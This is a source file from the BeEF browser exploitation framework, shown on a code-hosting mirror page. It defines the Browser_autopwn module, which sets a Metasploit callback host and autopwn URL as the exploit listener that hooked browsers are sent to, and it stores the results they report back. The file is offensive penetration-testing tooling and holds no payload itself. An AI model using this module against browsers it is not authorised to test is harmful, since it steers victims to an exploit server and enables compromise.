Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/metasploit/browser_autopwn/module.rb
1154 views
1
#
2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
# Browser Exploitation Framework (BeEF) - https://beefproject.com
4
# See the file 'doc/COPYING' for copying permission
5
#
6
class Browser_autopwn < BeEF::Core::Command
7
def self.options
8
@conf = BeEF::Core::Configuration.instance
9
@uri = 'Enter AutoPwn URL Here'
10
11
if @conf.get('beef.extension.metasploit.enable')
12
host = @conf.get('beef.extension.metasploit.callback_host')
13
url = @conf.get('beef.extension.metasploit.autopwn_url')
14
@uri = "http://#{host}:8080/#{url}"
15
end
16
17
[
18
{ 'name' => 'sploit_url', 'description' => 'The URL to exploit', 'ui_label' => 'Listener URL', 'value' => @uri, 'width' => '200px' }
19
]
20
end
21
22
# This method is being called when a hooked browser sends some
23
# data back to the framework.
24
#
25
def post_execute
26
save({ 'result' => @datastore['result'] })
27
end
28
end
29
30